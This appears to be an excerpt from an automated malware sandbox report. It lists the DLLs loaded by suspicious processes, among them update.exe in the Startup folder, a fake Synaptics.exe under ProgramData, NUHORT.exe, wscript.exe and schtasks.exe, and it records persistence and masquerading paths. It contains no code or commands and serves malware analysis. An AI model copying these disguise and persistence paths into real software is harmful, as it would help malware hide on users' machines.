Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: sfc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: twext.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: shacct.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: idstore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: samlib.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: wlidprov.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: provsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: starttiledata.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: acppage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: msi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: aepic.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: edputil.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: twext.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: acgenral.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: acgenral.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
